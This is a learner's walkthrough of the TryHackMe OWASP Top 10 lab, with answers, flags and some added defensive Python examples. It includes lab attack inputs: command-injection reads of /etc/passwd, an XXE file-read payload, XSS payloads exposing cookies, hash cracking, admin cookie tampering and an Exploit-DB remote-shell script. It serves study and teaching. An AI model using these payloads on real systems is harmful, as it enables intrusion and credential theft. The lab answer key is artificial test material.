OWASP Top 10

This blog contains my walkthrough of the OWASP Top 10 room on TryHackMe, written while trying to learn more about cybersecurity. Check out the original room as well here.

Injection

Task 5: Command Injection Practical

What strange text file is in the website root directory?

Simply enter

ls

The console will display several file names, of which the most probable answer is drpepper.txt

How many non-root/non-service/non-daemon users are there?

Enter

cat /etc/passwd 

This will list a bunch of users and other information. I will go over it step by step.

Firstly, /etc/passwd lists the accounts stored locally on the system. Each line has the structure user_name:encrypted_password:user_ID:user_group_ID:full_name:user_home_directory:user_bash_shell (the last field is the login shell; the password field is normally just "x" because the hashes live in /etc/shadow).

Now, on Ubuntu a normal (human) user gets a UID $\geq$ 1000; everything below that is a system or service account. As we can see, all the UIDs listed are below 1000, hence we get the answer as 0. Read more about this here.
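To make the counting rule above concrete, here is an added example (my own code, not part of the room) that parses /etc/passwd lines into the seven fields and counts the regular users. The sample passwd content is constructed and includes one regular user so the count is not trivially zero; it also shows the nobody account, whose UID 65534 is above 1000 but which is still a system account.

```python
# Added example (not from the TryHackMe room): parse /etc/passwd lines
# and count the accounts a human would log in with, using the same rule
# as the walkthrough: regular users get UID >= 1000 on Ubuntu/Debian,
# and "nobody" (UID 65534) is a system account despite its high UID.
from typing import Dict, List

# Constructed sample in the real /etc/passwd format (not the challenge box).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
"""

FIELDS = ("user_name", "password", "uid", "gid", "full_name", "home", "shell")
NOBODY_UID = 65534

def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split each non-empty, non-comment line into the seven colon fields."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        entries.append(dict(zip(FIELDS, parts)))
    return entries

def regular_users(text: str, min_uid: int = 1000) -> List[str]:
    """Names of accounts with UID >= min_uid, excluding the nobody account."""
    return [e["user_name"] for e in parse_passwd(text)
            if int(e["uid"]) >= min_uid and int(e["uid"]) != NOBODY_UID]

def shell_of(text: str, user: str) -> str:
    """Login shell of `user`, e.g. /usr/sbin/nologin for www-data."""
    for e in parse_passwd(text):
        if e["user_name"] == user:
            return e["shell"]
    raise KeyError(user)
```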

What user is the app running as?

Enter

whoami 

As can be seen, the answer is www-data

What is the user’s shell set as?

Again, enter

cat /etc/passwd

Now look at the shell field (user_bash_shell) of the www-data line, and we see that the answer is /usr/sbin/nologin

What version of Ubuntu is running?

Enter

hostnamectl

It displays information about the OS the server is running on. The answer is 18.04.4

For the question about the message of the day (MOTD), I figured out the answer simply by guessing from the name of the strange text file, drpepper.txt. The name fit the answer so well :p

For the proper way to find it, which I googled afterwards:

Enter

ls /etc/update-motd.d/
cat /etc/update-motd.d/00-header

The last line of the output mentions Dr Pepper, hence that is the answer.

Broken Authentication

Task 7: Broken Authentication Practical

What is the flag you find in darren’s account?

Do as the task describes, and once you log in you will see the flag fe86079416a21a3c99937fea8874b667

Now try the same trick and see if you can log in as arthur

Yes, you can

What is the flag that you found in arthur’s account?

d9ac0f7db4fda460ac3edeb75d75e16e

Sensitive Data Exposure

Task 11: Sensitive Data Exposure (Challenge)

What is the name of the mentioned directory?

Since the task says the directory is mentioned in the source code, I checked the main page's source but did not find anything. On going to the login page, though, I found /assets

Go to http://MACHINE_IP/assets/. Here we can see all the files and directories; the one that stands out as likely to hold sensitive data, and the answer to the next question, is webapp.db

Use the supporting material to access the sensitive data. What is the password hash of the admin user?

Download webapp.db. Then open it with

sqlite3 webapp.db

Once that is done, use the following commands

sqlite> .tables
sqlite> pragma table_info(users);
sqlite> select * from users;

The answer is 6eea9b7ef19179a06954edd0f6c05ceb

Crack the hash.

Paste the hash into CrackStation, as mentioned in the material, and crack the password. The answer is qwertyuiop

Log in as the admin, what is the flag?

Log in with the credentials you now have; the answer is THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

XML External Entity

Task 13: eXtensible Markup Language

Full form of XML

Extensible Markup Language

Is it compulsory to have an XML prolog in XML documents?

no

Can we validate XML documents against a schema?

yes

How can we specify the XML version and encoding in an XML document?

XML prolog

Document Type Definition (DTD)

How do you define a new ELEMENT?

!ELEMENT

How do you define a ROOT element?

!DOCTYPE

How do you define a new ENTITY?

!ENTITY

Task 16: Exploiting

Try to display your own name using any payload.

Enter

<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
    <firstName>falcon</firstName>
    <lastName>&name;</lastName>
</userInfo>

See if you can read /etc/passwd

Enter

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
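The two payloads above work because the parser honours the DTD the client sends. Here is an added example (my own code, not from the room) of the server-side mitigation: refuse any client XML that declares a DTD at all, which removes both the SYSTEM entity and internal-entity tricks, and then parse with the standard library. The benign request and the payload inputs are constructed from the ones shown above.

```python
# Added example (not from the room): accept XML from an untrusted client
# only if it carries no DTD, which removes external entities (the
# file:///etc/passwd payload) and entity-expansion tricks alike.
# Standard library only; defusedxml is the drop-in alternative for a real
# service, since a textual pre-check can be hidden from by odd encodings.
import re
import xml.etree.ElementTree as ET

_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)

def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse client XML, refusing any document that declares a DTD."""
    if _DOCTYPE_RE.search(data):
        raise ValueError("DTD declarations are not accepted from clients")
    return ET.fromstring(data)

def first_name(data: bytes) -> str:
    """The value a userInfo endpoint would read from the request."""
    root = parse_untrusted_xml(data)
    node = root.find("firstName")
    return node.text if node is not None and node.text else ""

def is_rejected(data: bytes) -> bool:
    """True if the document would be refused before parsing."""
    try:
        parse_untrusted_xml(data)
    except ValueError:
        return True
    return False

# Constructed inputs: a benign request and the two payloads from the room.
BENIGN = b"<userInfo><firstName>falcon</firstName><lastName>x</lastName></userInfo>"
INTERNAL_ENTITY = (b'<!DOCTYPE replace [<!ENTITY name "feast"> ]>'
                   b"<userInfo><lastName>&name;</lastName></userInfo>")
EXTERNAL_ENTITY = (b"<?xml version='1.0'?>"
                   b"<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>"
                   b"<root>&read;</root>")
```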

What is the name of the user in /etc/passwd?

This can be determined by the output of the previous question. The answer is falcon

Where is falcon’s SSH key located?

This was fairly simple. SSH keys live in the user's home directory as .ssh/id_rsa (private key) or .ssh/id_rsa.pub (public key). As the next question asks for the private key, we get the answer as /home/falcon/.ssh/id_rsa

What are the first 18 characters for falcon’s private key?

Simple enough: read the file at the location from the previous answer with the same technique. The answer is MIIEogIBAAKCAQEA7

Broken Access Control

Task 18: IDOR Challenge

Look at other users notes. What is the flag?

There are better ways to do this (using Burp Suite), but since I did not know about it when I started this challenge, I just got lucky by finding the answer at note=0

Security Misconfiguration

Task 19: Security Misconfiguration

Hack into the webapp, and find the flag!

So the first thing I did was go through the source code, but I couldn't find any comment of that sort there. Next, I thought to check Exploit-DB, but there too I did not get a good answer. After googling around, I found out that the answer was mentioned on the app's GitHub page

Cross-site Scripting

Craft a reflected XSS payload that will cause a popup saying “Hello”

The answer is simple enough

<script>alert('Hello')</script>

On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine’s IP address.

Google how to display your machine's IP address in JS, after which enter

<script>alert(window.location.host)</script>

Then add a comment and see if you can insert some of your own HTML

You can enter any HTML you want, for example:

<html>
    <body>
    <p> Hi </p>
    </body>
</html>

On the same page, create an alert popup box appear on the page with your document cookies.

Again, google how to display cookies in JS, then just write down the command:

<script>alert(document.cookie)</script>

Change “XSS Playground” to “I am a hacker” by adding a comment and using JS.

Go to the source code and find the id of the element that holds the title. Then use simple JS to change the heading (or use the hint :p)

<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
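All of the payloads in this section only fire because the page reflects input into HTML without encoding it. As an added example (my own code, not from the room), here is a minimal server-side render function with that bug next to the fixed version, checked against the payloads used above; the page template is constructed.

```python
# Added example (not from the room): the server side of a reflected XSS
# bug next to its fix. render_unsafe() interpolates the query verbatim,
# so the room's payloads become live script; render_safe() HTML-escapes
# the value so the browser shows it as text instead of executing it.
import html

# Constructed template for a search page like the room's XSS Playground.
PAGE = '<h1 id="thm-title">XSS Playground</h1><p>You searched for: {q}</p>'

def render_unsafe(query: str) -> str:
    """Vulnerable: user input lands in the HTML exactly as sent."""
    return PAGE.format(q=query)

def render_safe(query: str) -> str:
    """Fixed: escape <, >, & and (with quote=True) both quote characters,
    which also protects values placed inside attributes."""
    return PAGE.format(q=html.escape(query, quote=True))

def contains_script_tag(page: str) -> bool:
    """Cheap check used here to compare the two renderings."""
    return "<script" in page.lower()

# The three payloads the tasks above enter into the search box.
PAYLOADS = [
    "<script>alert('Hello')</script>",
    "<script>alert(window.location.host)</script>",
    "<script>alert(document.cookie)</script>",
]
```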

Insecure Deserialization

Task 21: Insecure Deserialization

Who developed the Tomcat application?

Google around. I initially got the answer as a single person who was responsible for it, but the expected answer is The Apache Software Foundation

What type of attack that crashes services can be performed with insecure deserialisation?

DoS, or Denial of Service

Task 25: Cookies Practical

Follow the instructions in the text. The cookie value is Base64 encoded, so just use any Base64 decoder to get the value of the cookies

2nd flag (admin dashboard)

Simply change the value of userType to "admin" and re-encode the cookie.
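The reason that edit works is that Base64 is encoding, not integrity protection. As an added example (my own code, not from the room), here is the unsigned cookie scheme next to an HMAC-signed one that rejects the same userType edit; SECRET_KEY and the session field names are assumptions.

```python
# Added example (not from the room): the cookie the task decodes is only
# Base64, so a client can decode it, set userType to admin and re-encode
# it. The signed variant attaches an HMAC-SHA256 tag so the server detects
# the edit. SECRET_KEY and the session field names are assumptions.
import base64
import hashlib
import hmac
import json

SECRET_KEY = b"server-side-secret-never-sent-to-clients"  # assumed value

def encode_unsigned(session: dict) -> str:
    """What the challenge app does: encoding, which is not integrity."""
    return base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode()).decode()

def decode_unsigned(cookie: str) -> dict:
    return json.loads(base64.urlsafe_b64decode(cookie))

def _tag(payload: str) -> str:
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()

def encode_signed(session: dict) -> str:
    payload = encode_unsigned(session)
    return payload + "." + _tag(payload)      # urlsafe Base64 never contains "."

def decode_signed(cookie: str) -> dict:
    """Return the session, or raise ValueError if the tag does not match."""
    payload, _, tag = cookie.rpartition(".")
    if not payload or not hmac.compare_digest(_tag(payload), tag):
        raise ValueError("cookie rejected: signature mismatch")
    return json.loads(base64.urlsafe_b64decode(payload))

def with_user_type(cookie: str, user_type: str) -> str:
    """Re-encode either cookie kind with userType changed, keeping the old
    tag if there was one; this is the edit a signed scheme must catch."""
    payload, dot, tag = cookie.rpartition(".")
    if not dot:                   # unsigned: the whole string is the payload
        payload = cookie
    session = decode_unsigned(payload)
    session["userType"] = user_type
    return encode_unsigned(session) + ("." + tag if dot else "")

def accepts(cookie: str) -> bool:
    """True if a server using the signed scheme would trust this cookie."""
    try:
        decode_signed(cookie)
        return True
    except ValueError:
        return False
```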

Components with Known Vulnerabilities

Task 29: Lab

How many characters are in /etc/passwd?

Go to Exploit-DB and look for exploits for CSE Bookstore (projectworld) that give remote shell access. As we can see, there is one.

Now download it and run the script. Its documentation is sufficient to know how to execute it.

python3 47887.py http://machine_ip/
wc -c /etc/passwd

Insufficient Logging and Monitoring

Task 30: Insufficient Logging and Monitoring

What IP address is the attacker using?

Look at the IP address that appears most often with unauthorised responses. As can be seen, the answer is 49.99.13.16

What kind of attack is being carried out?

From what can be seen, a different username is used in each request. Also, using the hint, we can tell that the answer is Brute Force
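The two observations above (one source IP dominating the failed logins, and that IP cycling through usernames) are exactly what a monitoring rule would encode. Here is an added example (my own code, not from the room) that runs that triage over a constructed log in a status/IP/username/timestamp/path layout; the attacker IP from the task is reused in the sample, the other values are made up.

```python
# Added example (not from the room): the triage a log reviewer does by
# hand, as code: count 401s per source IP on /login and flag an IP that
# cycles through many usernames, the brute-force pattern the task shows.
# The log format and all lines below are constructed.
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

SAMPLE_LOG = """\
200 OK           12.55.22.88 jr22    2019-03-12T09:21:17 /login
401 Unauthorized 49.99.13.16 admin   2019-03-12T09:21:21 /login
401 Unauthorized 49.99.13.16 root    2019-03-12T09:21:23 /login
401 Unauthorized 49.99.13.16 test    2019-03-12T09:21:24 /login
401 Unauthorized 49.99.13.16 guest   2019-03-12T09:21:26 /login
401 Unauthorized 12.55.22.88 jr22    2019-03-12T09:25:01 /login
200 OK           12.55.22.88 jr22    2019-03-12T09:25:09 /login
"""

def parse_log(text: str) -> List[Tuple[int, str, str, str]]:
    """Return (status, ip, username, path) for each well-formed line."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue               # skip blank or truncated lines
        rows.append((int(parts[0]), parts[2], parts[3], parts[5]))
    return rows

def failed_logins_by_ip(text: str) -> Dict[str, int]:
    """Number of 401 responses on /login per source IP."""
    return Counter(ip for status, ip, _, path in parse_log(text)
                   if status == 401 and path == "/login")

def suspected_brute_force(text: str, min_failures: int = 3,
                          min_users: int = 3) -> List[str]:
    """IPs with >= min_failures failed logins spread over >= min_users names.
    A single user mistyping a password (one failure, one name) is not flagged."""
    users = defaultdict(set)
    fails = Counter()
    for status, ip, user, path in parse_log(text):
        if status == 401 and path == "/login":
            fails[ip] += 1
            users[ip].add(user)
    return sorted(ip for ip, n in fails.items()
                  if n >= min_failures and len(users[ip]) >= min_users)

def top_offender(text: str) -> str:
    """The IP with the most failed logins, the first thing to look at."""
    return failed_logins_by_ip(text).most_common(1)[0][0]
```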